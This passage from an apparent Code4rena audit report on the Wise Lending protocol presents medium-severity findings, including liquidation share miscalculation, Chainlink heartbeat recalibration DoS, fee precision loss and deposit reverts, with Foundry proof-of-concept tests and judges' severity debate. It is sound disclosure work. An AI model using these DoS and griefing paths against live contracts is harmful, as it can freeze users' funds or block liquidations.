I recommend turning the deposited rewards into shares at the time of calling addCompoundRewards(), so we can get _validateSharePriceGrowth() to validate it immediately and revert on the spot if needed. This will prevent the DOS and share price growth manipulation.

Assessed type


Trust (judge) increased severity to High and commented:

High is reasonable for temporary freeze of funds.

vm06007 (Wise Lending) commented:

High is reasonable for temporary freeze of funds.

That is literally definition of a Medium - temporary freeze of the funds. High is permanent freeze of funds. So dismiss the high.

vm06007 (Wise Lending) commented:


2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.

3 — High: Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals.

Trust (judge) commented:

This is on the upper end of temporary FoF attacks, it also lasts for an extended duration. I would rule High on much weaker versions of this finding, not even close to downgrade-worthy.

Alex the Entreprenerd (Appellate Court judge) commented:

Summary of the issue

Due to a security check on LP value growth, a donation can cause the temporary inability to withdraw from a Farm Contract


Alex the Entreprenerd (Appellate Court lead judge) commented: Facts: The Dos has a cost, that grows with supply. The Dos can be performed permissionlessly, at any time.

I’m unclear as to whether this is tied to liquidation risk, which should raise the severity.

hickuphh3 (judge 2) commented: From what I see, it shouldn’t affect liquidations or protocol health, only causing forced hodl with guaranteed returns. Hence, leaning towards Medium more than High.

Alex the Entreprenerd (Appellate Court lead judge) commented: Facts: Information contained in the report mentions exclusively an inability to withdraw (funds stuck). Other facts above still apply.

I agree that Medium Severity seems the most appropriate because:

  • More supply = higher cost.
  • Dos is temporary.
  • Unclear/Missing usage to DOS a key feature.

LSDan (judge 3) commented: I’m also of the opinion that Medium is more appropriate here.

2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.

Assets are not at direct risk. The minute the DOS stops the assets are once again available. Further, the cost to DOS the platform is not trivial. As you both pointed out, the more assets being frozen, the higher the cost. The attacker is donating to the users they are DOSing, leaving the user inconvenienced, but richer at the attacker’s expense.


The severity is downgraded to Medium unanimously.

Additional Context by the Lead Judge

Had the Report shown a way to weaponize this to halt liquidations, we would have had a easier time pushing for a higher severity.

However, given the Report only limiting itself to a temporary inability to withdraw, with no loss of principal, the decision was straightforward.

Trust (judge) commented:

  1. I remain convinced that a permissionless, non-theoretical temporary FoF for non-negligible length (certainly days/weeks as shown) meets High severity threshold.
  2. Impact breaks a core invariant which states users can always pull out their funds. Users making monetary decisions under that assumption can certainly face loss of principal (e.g. cannot pull out to repay a due-loan, etc).

Wise Lending commented:

Mitigated here.

Note, this finding was downgraded to Medium by C4 staff in reference to the Appellate Court decision.

[M-13] Incorrect calculation of lending shares in _withdrawOrAllocateSharesLiquidation can lead to revert and failure to liquidate

Submitted by WoolCentaur, also found by SBSecurity and AM

When liquidating a user, _withdrawOrAllocateSharesLiquidation() can be called which checks if a pool is large enough to pay out the liquidator, and if not, then the liquidator is allocated shares that can be used to withdraw at a later time when the pool is large enough. There are two scenarios in which the pool will not be large enough to pay out the liquidator:

  1. The obvious scenario where the pool simply doesn’t contain enough tokens to cover the withdraw amount.
  2. So many tokens are borrowed out of the pool that there isn’t enough available to pay out the liquidator.

Note: If there are some tokens available but not enough to cover the entire withdraw amount, then those tokens are transferred, dropping the total pool to 0, and the rest are allocated as shares.

However, if these scenarios were ever to arise, the _withdrawOrAllocateSharesLiquidation() function would not work as expected. This is due to how it calculates the lending shares (totalPoolInShares) of the total pool:


When liquidating, it will calculate the totalPoolInShares like this (with amount being the total pool):

       lendingShares = (totalDepositShares * amount) / pseudoTotalPool - 1;

However, calculating the lending shares this way will cause the _compareSharePrices() to revert on the syncPool modifier. Specifically the check on


This is because _maxSharePrice is passed in as false to calculateLendingShares(), which subtracts one.

    uint256 totalPoolInShares = calculateLendingShares(
                    _poolToken: _poolToken,
                    _amount: totalPoolToken,
                    _maxSharePrice: false


However, because we are withdrawing, it should be set to true so that it adds one. In all other areas where calculateLendingShares() is being used, the functions that focus on withdrawing have _maxSharePrice: true and the depositing functions have _maxSharePrice: false:

withdrawOnBehalfExactAmount on WiseLending.sol.

_preparationsWithdraw on MainHelper.sol.

_handleDeposit on WiseCore.sol.

When _maxSharePrice is set to true, the _validateParameter() check will pass.

Even if the _validateParameter() check did not exist, if _maxSharePrice is left as-is (set to false), any subsequent liquidations through _withdrawOrAllocateSharesLiquidation() would revert with panic due to an underflow. This is because (as stated above), liquidating when the pool is not large enough to pay out the liquidator will drop the total pool to 0 and issue the remainder as shares. Therefore, any subsequent calls to liquidate when the total pool is 0 will underflow:

        //amount is totalPoolToken which in this scenario = 0;
        shares = amount * totalDepositShares / pseudoTotalPool - 1


When a particular receiving token is desired and _withdrawOrAllocateSharesLiquidation() is called, the liquidation will always revert if the total pool is not large enough to cover the withdraw amount. This defeats the purpose of _withdrawOrAllocateSharesLiquidation(), as stated in the NatSpec:

         * @dev Internal math function for liquidation logic
         * which checks if pool has enough token to pay out
         * liquidator. If not, liquidator get corresponding
         * shares for later withdraw.

This will lead to frustrated users who desire a particular receiving token. The level of frustration will be even higher if the reason this function reverts is because the total pool is borrowed out. This would lead to a very high APY, thus a much higher desire to receive the particular token. Additionally, the borrowers in these particular situations will not be liquidated even though they should be. Ultimately, this will lead to loss of faith in the protocol.

However, this can be easily avoided by just passing in a different receiving token that is large enough to payout the withdraw amount, which is why this is a medium level issue.

Proof of Concept

Copy and paste this foundry test into the /contracts folder and run forge test --fork-url mainnet --match-path ./contracts/WoolCentaurLiquidationTest.t.sol --match-test testLiquidateMockPool -vvvv. As the code is, the test will fail. To have it pass, change the bool here to true.

    // SPDX-License-Identifier: -- WISE --

    pragma solidity =0.8.24;

    import "forge-std/Test.sol";
    import "forge-std/StdUtils.sol";
    import "./InterfaceHub/IBalancerFlashloan.sol";
    import "./InterfaceHub/IWiseLending.sol";
    import "./InterfaceHub/ICurve.sol";
    import "./InterfaceHub/IAaveHub.sol";
    import "./InterfaceHub/IAave.sol";
    import "./InterfaceHub/IPositionNFTs.sol";
    import "./WiseLendingBaseDeployment.t.sol";
    import "./PoolManager.sol";

    contract WoolCentaur is BaseDeploymentTest {

            function testLiquidateMockPool() public {
                // Setup new fork and deal tokens

                        _mainnetFork: false

                vm.deal(address(1), 2000 ether);
                vm.deal(WISE_DEPLOYER, 1000 ether);
                address paybackToken = address(MOCK_AAVE_ATOKEN_3);
                address receivingToken = address(MOCK_AAVE_ATOKEN_4);
                address mockWETH = address(MOCK_WETH);
                deal(paybackToken, WISE_DEPLOYER, 11000e6);
                deal(receivingToken, address(1), 200000e6);
                deal(mockWETH, WISE_DEPLOYER, 1000e18);
                deal(mockWETH, address(1), 1000e18);

                //Mint position nfts to address 1


                uint256[] memory nftsOfOwner1 = POSITION_NFTS_INSTANCE.walletOfOwner(

                uint256 nftIdFirst = nftsOfOwner1[0];


                // Mint position nfts to WISE_DEPLOYER

                uint256[] memory nftsOfOwner2 = POSITION_NFTS_INSTANCE.walletOfOwner(

                uint256 nftIdSecond = nftsOfOwner2[0];

                //Approve and deposit the payback tokens


                //Approve and deposit the collateral tokens



                //Deposit collateral tokens
                    value: 2000 ether

                //Set the value of the receiving token
                    0.00000000000000001 ether
                //Approve and deposit the receiving token

                //Set the value of the payback token
                    0.00000000000000001 ether
                //Liquidatee borrows 100% the payback token
                //Set the new value of payback token, pushing it into bad debt so it can be liquidated
                    0.00000001 ether


                //Liquidator borrows 100% of the receivingToken so shares must be issued

                (, uint256 liquidateeLendingSharesBefore) = LENDING_INSTANCE.userLendingData(nftIdFirst, (receivingToken));
                (, uint256 liquidatorLendingSharesBefore) = LENDING_INSTANCE.userLendingData(nftIdSecond, (receivingToken));
                //assert that the liquidator starts with 0 shares
                assertEq(liquidatorLendingSharesBefore, 0);
                emit log_named_uint("shares of liquidatee before", liquidateeLendingSharesBefore);
                emit log_named_uint("shares of liquidator before", liquidatorLendingSharesBefore);
                //Approve and liquidate the respective shares and tokens


                (, uint256 liquidateeLendingSharesAfter) = LENDING_INSTANCE.userLendingData(nftIdFirst, (receivingToken));
                (, uint256 liquidatorLendingSharesAfter) = LENDING_INSTANCE.userLendingData(nftIdSecond, (receivingToken));
                //asserts that the liquidator shares have increased
                assertNotEq(liquidatorLendingSharesAfter, 0);
                emit log_named_uint("shares of liquidatee after", liquidateeLendingSharesAfter);
                emit log_named_uint("shares of liquidator after", liquidatorLendingSharesAfter);
                //asserts that the liquidatee + the liquidator = the total shares
                assertEq(liquidateeLendingSharesAfter + liquidatorLendingSharesAfter, 19999999998);

Tools Used


Change the _maxSharePrice under calculateLendingShares on _withdrawOrAllocateSharesLiquidation() to true.

Assessed type


vm06007 (Wise Lending) commented via duplicate issue #238:

That seems to be like a desired functionality by design and expected behavior. @vonMangoldt can confirm.

vonMangoldt (Wise Lending) commented via duplicate issue #238:

This looks right from my first looking into it. Just curious why it didn’t DOS in our javascript tests. Probably the percentage roundings (etc.) need to be aligned for that behaviour.

Trust (judge) commented:

Selected as best because of good POC + well balanced severity rationalization.

Wise Lending commented:

Mitigated here.

Submitted by 00xSEV

Currently, if there are 50 fast updates followed by no updates, a Chainlink Oracle will be considered dead, even though it’s normal behavior. Chainlink Oracles update either after some time has passed or upon a price change.

Vulnerability Details

How it will revert:

There is a _chainLinkIsDead function that returns true if the last update took longer than the heartbeat. See here.

unchecked {
	upd = block.timestamp < upd
		? block.timestamp
		: block.timestamp - upd;

	return upd > heartBeat[_tokenAddress];

It’s essentially called on every request to the Chainlink Oracle, before the actual call, to ensure the price is up to date.

How does recalibrate work?

heartBeat is updated when recalibrate/recalibrateBulk is called. Anyone can call them. Both of these functions call _recalibrate. See here.

        heartBeat[_tokenAddress] = _recalibratePreview(

In _recalibratePreview, we see that currentSecondBiggest is returned, representing the second-largest difference between updates. Thus, heartBeat is set to the second-largest time difference between two consecutive updates in the last 50 updates. iterationCount is capped by MAX_ROUND_COUNT in _getIterationCount, which is set to 50.

How do Chainlink updates work?

Aggregators receive updates from the Oracle network only when the Deviation Threshold or Heartbeat Threshold triggers an update during an aggregation round. The first condition that is met triggers an update to the data.

  • Deviation Threshold: A new aggregation round starts when a node identifies that the off-chain values deviate by more than the defined deviation threshold from the onchain value. Individual nodes monitor one or more data providers for each feed.
  • Heartbeat Threshold: A new aggregation round starts after a specified amount of time from the last update.

If you check “Show more details” here, you can see that for most feeds, deviation is set to 1-2% and heartbeat is 86400s = 24 hours. However, some feeds are set to 0.5% or even less.

If there’s a period of high volatility followed by no volatility, it’s possible that heartBeat in Wise will be set to a low value. Consequently, the Chainlink feed will be considered dead after a short period of no updates.

E.g., if there are 50 updates, once every minute, followed by 10 hours of no updates, and then no updates for an additional 24 hours, the heartBeat will be set to 1 minute in Wise. Consequently, the Oracle will be considered dead after 1 minute of no updates. This means it will be considered dead for the initial 10 hours, then considered alive for 1 minute, and then considered dead again for the following 24 hours.

Examples demonstrating similar events in the wild can be seen in this Dune dashboard.


The Chainlink Oracle is considered dead for a substantial amount of time, affecting liquidations, deposits, withdrawals, and all other functions using this Oracle.

The attacker can disable the entire market that uses the Oracle by calling recalibrate. This can lead to bad debt (the price changes rapidly, but the Oracle still reverts after the first update), griefing (users cannot use the protocol), etc.

It can be even worse if combined with block stuffing or when the gas price is too high and Chainlink does not update. The updates stop coming as often as usual, and the feed is considered dead long enough to accrue bad debt. For example, if the last 50 updates occurred every minute, a sudden spike in demand for block space could make updates come only once an hour, preventing liquidations for 1-2 hours.

Proof of Concept

forge test -f https://mainnet.infura.io/v3/YOUR_KEY -vvv --mt testOne --mc ChainlinkDies$


pragma solidity =0.8.24;

import "forge-std/console.sol";
import "forge-std/Test.sol";
import "../WiseOracleHub/OracleHelper.sol";

contract OracleHelperMock is OracleHelper {
        address _wethAddress,
        address _ethPriceFeed,
        address _uniswapV3Factory
    ) Declarations(_wethAddress, _ethPriceFeed, _uniswapV3Factory) {

    function addOracle(
        address _tokenAddress,
        IPriceFeed _priceFeedAddress,
        address[] calldata _underlyingFeedTokens
    ) external {

    function recalibrate(
        address _tokenAddress

    function chainLinkIsDead(
        address _tokenAddress
        returns (bool)
       return _chainLinkIsDead(_tokenAddress);

interface PartialAccessControlledOffchainAggregator is IPriceFeed {
    function disableAccessCheck() external;
    function owner() external returns (address);
    function checkEnabled() external returns (bool);

contract ChainlinkDies is Test {
    address WETH_ADDRESS = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address ETH_PRICE_FEED = 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419;
    address UNISWAP_V3_FACTORY = 0x1F98431c8aD98523631AE4a59f267346ea31F984;

    address FEI = 0x956F47F50A910163D8BF957Cf5846D573E7f87CA;
    PartialAccessControlledOffchainAggregator FEI_ETH_FEED = 

    uint LAST_NORMAL_BLOCK = 16_866_049;
    // one block before the update after no updates for a day
    uint TARGET_BLOCK = 16_872_122; 

    function testOne() external {
        OracleHelperMock sut = _test(LAST_NORMAL_BLOCK);

        sut = _test(TARGET_BLOCK);

    function _test(uint blockNumber) internal returns (OracleHelperMock) {


        OracleHelperMock sut = new OracleHelperMock(WETH_ADDRESS, ETH_PRICE_FEED, UNISWAP_V3_FACTORY);
        // make sure recalibrate works
        sut.addOracle( {
            _tokenAddress: FEI,
            _priceFeedAddress: FEI_ETH_FEED,
            _underlyingFeedTokens: new address[](0)
        } );
        console.log("block:", blockNumber);
        console.log("chainLinkIsDead:", sut.chainLinkIsDead(FEI));

        return sut;


Consider setting Chainlink’s native heartbeat instead. Also consider adding access control to recalibrate functions and only calling it when it will not lead to DoS.

Assessed type


vonMangoldt (Wise Lending) commented:

It takes second highest out of last 50 rounds if you recalibrate. If it takes forever to update for chainlink it means there is no volatility. So dismissed.

Trust (judge) commented:

Warden discussed a potential scenario when the Oracle would be considered dead after just one minute of inactivity.

vm06007 (Wise Lending) commented:

@Trust - it depends on the expected heartbeat, if it’s one minute, and latest data does not come within that frame then Oracle SHOULD be considered dead.

Example: recalibrate() looks for second longest time gap between latest 50 (or 500 depending on chain) rounds, by analyzing timegaps between reported prices in last 50/500 rounds contract chooses appropriate expected timeframe when Oracle needs to answer before considered dead. If the time frame is too short this is only because that what was picked up from latest round data and should be honored (unlike this finding).

Note that it can be recalibrated to increase the expected time if needed.

Wise Lending commented:

Mitigated here.

[M-15] Precision loss in the calculation of the fee amounts and fee shares inside the _preparePool function of the MainHelper contract

Submitted by Matin

Low fee amounts and fee shares are calculated in the preparation part due to the precision loss.

Proof of Concept

Solidity rounds down the result of an integer division, and because of that, it is always recommended to multiply before dividing to avoid that precision loss. In the case of a prior division over multiplication, the final result may face serious precision loss as the first answer would face truncated precision and then multiplied to another integer.

The problem arises in the pool’s preparation part before applying the LASA algorithm. After cleaning up the pool, the next step is to update the pseudo amounts and adding the corresponding fee shares of that pool.

If we look deeply at the function _updatePseudoTotalAmounts() we can see the fee shares calculation procedure is presented as:

        uint256 amountInterest = bareIncrease

        uint256 feeAmount = amountInterest
            * globalPoolData[_poolToken].poolFee
            / PRECISION_FACTOR_E18;

We can see there is a hidden division before a multiplication that makes round down the whole expression. This is bad as the precision loss can be significant, which leads to the pool printing less feeAmount than actual.

Also, it is better to mention that some protocols implement this method to have an integer part of the division (usually in time-related situations). But we can clearly see that this pattern is used in the calculation of feeAmount at which the precision matters. Furthermore, the mentioned error will escalate, especially when the bareIncrease is bigger but close to the PRECISION_FACTOR_YEAR amount. The precision loss becomes more serious at lower discrepancies (such as 1.2 ~ 2 magnitudes of PRECISION_FACTOR_YEAR).

As for the Proof of Concept part, we can check this behavior precisely. You can run this code to see the difference between the results:

    function test_precissionLoss() public {

        uint x = (PRECISION_FACTOR_YEAR * 3)/ 2; // This number represents the `bareIncrease`
        uint256 poolFee = 789600000000000000000000; // This number represents the `poolFee`

        uint256 amountInterest = x

        uint256 feeAmount1 = amountInterest
            * poolFee
            / PRECISION_FACTOR_E18;

        uint256 feeAmount2 = (x * poolFee) / (PRECISION_FACTOR_YEAR * PRECISION_FACTOR_E18);
        console.log("Current Implementation ", feeAmount1);
        console.log("Actual Implementation ", feeAmount2);

The result would be: (for 1.5 of PRECISION_FACTOR_YEAR):

         Current Implementation  789600
         Actual Implementation  1184400

Thus, we can see that the actual implementation produces less fee amount than the precise method. This test shows a big difference between the two calculated fee amounts in the LASA algorithm.

Tools Used


Consider modifying the fee shares calculation to prevent such precision loss and prioritize the multiplication over division:

        uint256 amountInterest = bareIncrease

        uint256 feeAmount = bareIncrease
            * globalPoolData[_poolToken].poolFee

Assessed type


Wise Lending commented:

Mitigated here.

[M-16] A user can lose more value than he specifies in the spread when he enters a PowerFarm

Submitted by nonseodion

When a user enters or exits a PowerFarm, he specifies an allowed spread. The spread specifies the minimum value of the position allowed at the end of the transaction.

E.g. a spread of 105% on a position with a value of $1000 ensures the value does not fall below $950.

1000 * (200-105) / 100 = 950

When a user opens a position on Arbitrum, the ENTRY_ASSET is converted to WETH on UniswapV3. The second argument in line 434 specifies the minimum value for the swap. The spread is applied to this argument. Hence, the _depositAmount in line 432 cannot go less than what the spread allows.


426:         uint256 reverseAllowedSpread = 2
427:             * PRECISION_FACTOR_E18
428:             - _allowedSpread;
430:         if (block.chainid == ARB_CHAIN_ID) {
432:             _depositAmount = _getTokensUniV3(
433:                 _depositAmount,
434:                 _getEthInTokens(
435:                         ENTRY_ASSET,
436:                         _depositAmount
437:                     )
438:                 * reverseAllowedSpread
439:                 / PRECISION_FACTOR_E18,
440:                 WETH_ADDRESS,
441:                 ENTRY_ASSET
442:             );
443:         }

The value at the end of the transaction is checked in line 508 below to ensure it does not go below the allowed spread. The ethValueBefore is calculated from _depositAmount in line 489. Note that if the swap on Uniswap occurred the _depositAmount may already be the minimum value. The ethValueAfter is scaled with the allowed spread in line 501.


489:         uint256 ethValueBefore = _getTokensInETH(
490:             ENTRY_ASSET,
491:             _depositAmount
492:         );
494:         (
495:             uint256 receivedShares
496:             ,
497:         ) = IPendleChild(PENDLE_CHILD).depositExactAmount(
498:             netLpOut
499:         );
500:         // @audit-issue the calculation for ethValueAfter below is incorrect
501:         uint256 ethValueAfter = _getTokensInETH(
502:             PENDLE_CHILD,
503:             receivedShares
504:         )
505:             * _allowedSpread
506:             / PRECISION_FACTOR_E18;
507:         // @audit-issue ethValueBefore on Arbitrum uses the depositAmount that allowedSpread has already been applied
508:         if (ethValueAfter < ethValueBefore) {
509:             revert TooMuchValueLost();
510:         }

Thus the comparison in line 508 may compare ethValueAfter with the minimum value of the spread instead of the value of the initial deposit. With this implementation, if the spread for a $1000 transaction is 105%, the minimum value after the transaction becomes $902.5.

(1000 * 95 / 100) * (95/100) = 902.5. The user can lose $47.5 (950-902.5).

Note: In the implementation, the value at the end is scaled up instead of the value at the beginning being scaled down like the examples show. Hence, the actual minimum value is lesser i.e. ~$904.76 (950/1.05). This is a different bug.

Proof of Concept

  1. A user enters the market with $1000 of WBTC and specifies a spread of 105%.
  2. At the end of the transaction the comparison is done against $950. So the actual value he gets can be between ~$904.76 and $950 and the transaction would pass.
  3. The user may lose between $0 and $45.24 (950 - 904.76).

Consider storing the actual deposit and using it to calculate ethValueBefore.


        uint256 reverseAllowedSpread = 2
            * PRECISION_FACTOR_E18
            - _allowedSpread;
+       unit256 actualDeposit = _depositAmount;
        if (block.chainid == ARB_CHAIN_ID) {

            _depositAmount = _getTokensUniV3(
                * reverseAllowedSpread
                / PRECISION_FACTOR_E18,

        uint256 ethValueBefore = _getTokensInETH(
-            _depositAmount
+.           actualDeposit

Assessed type


Wise Lending commented:

Mitigated here.

[M-17] User’s attempt to deposit & withdraw reverts due to the calculation style inside _calculateShares()

Submitted by t0x1c, also found by DanielArmstrong

Scenario 1:

The following flow of events (one among many) causes a revert:

  1. Alice calls depositExactAmountETH() to deposit 1 ether. This executes successfully, as expected.
  2. Bob calls depositExactAmountETH() to deposit 1.5 ether (or 0.5 ether or 1 ether or 2 ether or any other value). This reverts unexpectedly.

In case Bob was attempting to make this deposit to rescue his soon-to-become or already bad debt and to avoid liquidation, this revert will delay his attempt which could well be enough for him to be liquidated by any liquidator, causing loss of funds for Bob. Here’s a concrete example with numbers:

  1. Bob calls depositExactAmountETH() to deposit 1 ether. This executes successfully, as expected.
  2. Bob calls borrowExactAmountETH() to borrow 0.7 ether. This executes successfully, as expected.
  3. Bob can see that price is soon going to spiral downward and cause a bad debt. He plans to deposit some additional collateral to safeguard himself. He calls depositExactAmountETH() again to deposit 0.5 ether. This reverts unexpectedly.
  4. Prices go down and he is liquidated.

Scenario 2:

A similar revert occurs when the following flow of events occur:

  1. Alice calls depositExactAmountETH() to deposit 10 ether. This executes successfully, as expected.
  2. Bob calls withdrawExactAmountETH() to withdraw 10 ether (or 10 ether - 1 or 10 ether - 1000 or 9.5 ether or 9.1 ether). This reverts unexpectedly.

Bob is not able to withdraw his entire deposit. If he leaves behind 1 ether and withdraws only 9 ether, then he does not face a revert.

In both of the above cases, eventually the revert is caused by the validation failure on L234-L237 due to the check inside _validateParameter():

  File: contracts/WiseLending.sol

  210:              function _compareSharePrices(
  211:                  address _poolToken,
  212:                  uint256 _lendSharePriceBefore,
  213:                  uint256 _borrowSharePriceBefore
  214:              )
  215:                  private
  216:                  view
  217:              {
  218:                  (
  219:                      uint256 lendSharePriceAfter,
  220:                      uint256 borrowSharePriceAfter
  221:                  ) = _getSharePrice(
  222:                      _poolToken
  223:                  );
  225:                  uint256 currentSharePriceMax = _getCurrentSharePriceMax(
  226:                      _poolToken
  227:                  );
  229:                  _validateParameter(
  230:                      _lendSharePriceBefore,
  231:                      lendSharePriceAfter
  232:                  );
  234: @--->            _validateParameter(
  235: @--->                lendSharePriceAfter,
  236: @--->                currentSharePriceMax
  237:                  );
  239:                  _validateParameter(
  240:                      _borrowSharePriceBefore,
  241:                      currentSharePriceMax
  242:                  );
  244:                  _validateParameter(
  245:                      borrowSharePriceAfter,
  246:                      _borrowSharePriceBefore
  247:                  );
  248:              }

Root Cause

  1. _compareSharePrices() is called by _syncPoolAfterCodeExecution() which is executed due to the syncPool modifier attached to depositExactAmountETH().
  2. Before _syncPoolAfterCodeExecution() in the above step is executed, the following internal calls are made by depositExactAmountETH():

    • The _handleDeposit() function is called on L407 which in-turn calls calculateLendingShares() on L115.
    • The calculateLendingShares() function now calls _calculateShares() on L26.
    • _calculateShares() decreases the calculated shares by 1 which is represented by the variable lendingPoolData[_poolToken].totalDepositShares inside _getSharePrice().
    • The _getSharePrice() functions uses this lendingPoolData[_poolToken].totalDepositShares variable in the denominator on L185-187 and in many cases, returns an increased value (in this case it evaluates to 1000000000000000001) which is captured in the variable lendSharePriceAfter inside _compareSharePrices().
  3. Circling back to our first step, this causes the validation to fail on L234-L237 inside _compareSharePrices() since the lendSharePriceAfter is now greater than currentSharePriceMax i.e. 1000000000000000001 > 1000000000000000000. Hence, the transaction reverts.

The reduction by 1 inside _calculateShares() is done by the protocol in its own favour to safeguard itself. The lendingPoolData[_poolToken].pseudoTotalPool; however, is never modified. This mismatch eventually reaches a significant divergence, and is the root cause of these reverts.


  • The last comment inside the Proof of Concept-2 (Withdraw scenario) section later in the report.
  • Option1 inside the Recommended Mitigation Steps section later in the report.
  File: contracts/WiseLending.sol

  97:               modifier syncPool(
  98:                   address _poolToken
  99:               ) {
  100:                  (
  101:                      uint256 lendSharePrice,
  102:                      uint256 borrowSharePrice
  103:                  ) = _syncPoolBeforeCodeExecution(
  104:                      _poolToken
  105:                  );
  107:                  _;
  109: @--->            _syncPoolAfterCodeExecution(
  110:                      _poolToken,
  111:                      lendSharePrice,
  112:                      borrowSharePrice
  113:                  );
  114:              }
  File: contracts/WiseLending.sol

  308:              function _syncPoolAfterCodeExecution(
  309:                  address _poolToken,
  310:                  uint256 _lendSharePriceBefore,
  311:                  uint256 _borrowSharePriceBefore
  312:              )
  313:                  private
  314:              {
  315:                  _newBorrowRate(
  316:                      _poolToken
  317:                  );
  319: @--->            _compareSharePrices(
  320:                      _poolToken,
  321:                      _lendSharePriceBefore,
  322:                      _borrowSharePriceBefore
  323:                  );
  324:              }
  File: contracts/WiseLending.sol

  388:              function depositExactAmountETH(
  389:                  uint256 _nftId
  390:              )
  391:                  external
  392:                  payable
  393:                  syncPool(WETH_ADDRESS)
  394:                  returns (uint256)
  395:              {
  396: @--->            return _depositExactAmountETH(
  397:                      _nftId
  398:                  );
  399:              }
  401:              function _depositExactAmountETH(
  402:                  uint256 _nftId
  403:              )
  404:                  private
  405:                  returns (uint256)
  406:              {
  407: @--->            uint256 shareAmount = _handleDeposit(
  408:                      msg.sender,
  409:                      _nftId,
  410:                      WETH_ADDRESS,
  411:                      msg.value
  412:                  );
  414:                  _wrapETH(
  415:                      msg.value
  416:                  );
  418:                  return shareAmount;
  419:              }
  File: contracts/WiseCore.sol

  106:              function _handleDeposit(
  107:                  address _caller,
  108:                  uint256 _nftId,
  109:                  address _poolToken,
  110:                  uint256 _amount
  111:              )
  112:                  internal
  113:                  returns (uint256)
  114:              {
  115: @--->            uint256 shareAmount = calculateLendingShares(
  116:                      {
  117:                          _poolToken: _poolToken,
  118:                          _amount: _amount,
  119: @--->                    _maxSharePrice: false
  120:                      }
  121:                  );
  File: contracts/MainHelper.sol

  17:               function calculateLendingShares(
  18:                   address _poolToken,
  19:                   uint256 _amount,
  20:                   bool _maxSharePrice
  21:               )
  22:                   public
  23:                   view
  24:                   returns (uint256)
  25:               {
  26:  @--->            return _calculateShares(
  27:                       lendingPoolData[_poolToken].totalDepositShares * _amount,
  28:                       lendingPoolData[_poolToken].pseudoTotalPool,
  29:                       _maxSharePrice
  30:                   );
  31:               }
  33:               function _calculateShares(
  34:                   uint256 _product,
  35:                   uint256 _pseudo,
  36:                   bool _maxSharePrice
  37:               )
  38:                   private
  39:                   pure
  40:                   returns (uint256)
  41:               {
  42:                   return _maxSharePrice == true
  43:                       ? _product / _pseudo + 1
  44:  @--->                : _product / _pseudo - 1;
  45:               }
  File: contracts/WiseLending.sol

  210:              function _compareSharePrices(
  211:                  address _poolToken,
  212:                  uint256 _lendSharePriceBefore,
  213:                  uint256 _borrowSharePriceBefore
  214:              )
  215:                  private
  216:                  view
  217:              {
  218:                  (
  219: @--->                uint256 lendSharePriceAfter,
  220:                      uint256 borrowSharePriceAfter
  221: @--->            ) = _getSharePrice(
  222:                      _poolToken
  223:                  );
  225:                  uint256 currentSharePriceMax = _getCurrentSharePriceMax(
  226:                      _poolToken
  227:                  );
  229:                  _validateParameter(
  230:                      _lendSharePriceBefore,
  231:                      lendSharePriceAfter
  232:                  );
  234:                  _validateParameter(
  235: @--->                lendSharePriceAfter,
  236:                      currentSharePriceMax
  237:                  );
  239:                  _validateParameter(
  240:                      _borrowSharePriceBefore,
  241:                      currentSharePriceMax
  242:                  );
  244:                  _validateParameter(
  245:                      borrowSharePriceAfter,
  246:                      _borrowSharePriceBefore
  247:                  );
  248:              }
  File: contracts/WiseLending.sol

  165:              function _getSharePrice(
  166:                  address _poolToken
  167:              )
  168:                  private
  169:                  view
  170:                  returns (
  171:                      uint256,
  172:                      uint256
  173:                  )
  174:              {
  175:                  uint256 borrowSharePrice = borrowPoolData[_poolToken].pseudoTotalBorrowAmount
  176:                      * PRECISION_FACTOR_E18
  177:                      / borrowPoolData[_poolToken].totalBorrowShares;
  179:                  _validateParameter(
  180:                      MIN_BORROW_SHARE_PRICE,
  181:                      borrowSharePrice
  182:                  );
  184:                  return (
  185:                      lendingPoolData[_poolToken].pseudoTotalPool
  186:                          * PRECISION_FACTOR_E18
  187: @--->                    / lendingPoolData[_poolToken].totalDepositShares,
  188:                      borrowSharePrice
  189:                  );
  190:              }

Proof of Concept

Deposit scenario:

Add the following tests inside contracts/WisenLendingShutdown.t.sol and run via forge test --fork-url mainnet -vvvv --mt test_t0x1c_DepositsRevert to see the tests fail.

    function test_t0x1c_DepositsRevert_Simple() 
        uint256 nftId;
        nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 1 ether}(nftId); // @audit-info : If you want to make the test pass, change this to `2 ether`

        address bob = makeAddr("Bob");
        vm.deal(bob, 10 ether); // give some ETH to Bob

        uint256 nftId_bob = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 1.5 ether}(nftId_bob); // @audit : REVERTS incorrectly (reverts for numerous values like `0.5 ether`, `1 ether`, `2 ether`, etc.)

    function test_t0x1c_DepositsRevert_With_Borrow() 
        address bob = makeAddr("Bob");
        vm.deal(bob, 10 ether); // give some ETH to Bob

        uint256 nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 1 ether}(nftId); // @audit-info : If you want to make the test pass, change this to `2 ether`

        LENDING_INSTANCE.borrowExactAmountETH(nftId, 0.7 ether);

        LENDING_INSTANCE.depositExactAmountETH{value: 0.5 ether}(nftId); // @audit : REVERTS incorrectly; Bob can't deposit additional collateral to save himself

If you want to check with values which make the test pass, change the following line in both the tests and run again:

-     LENDING_INSTANCE.depositExactAmountETH{value: 1 ether}(nftId); // @audit-info : If you want to make the test pass, change this to `2 ether`
+     LENDING_INSTANCE.depositExactAmountETH{value: 2 ether}(nftId); // @audit-info : If you want to make the test pass, change this to `2 ether`

There are numerous combinations which will cause such a “revert” scenario to occur. Just to provide another example:

Four initial deposits are made in either Style1 or Style2:

    - Style1:
        - Alice makes 4 deposits of `2.5 ether` each. Total deposits made by Alice = 4 /ast 2.5 ether = 10 ether.
    - Style2:
        - Alice makes a deposit of `2.5 ether`
        - Bob makes a deposit of `2.5 ether`
        - Carol makes a deposit of `2.5 ether`
        - Dan makes a deposit of `2.5 ether`. Total deposits made by 4 users = 4 /ast 2.5 ether = 10 ether.

Now, Emily tries to make a deposit of 2.5 ether. This reverts.

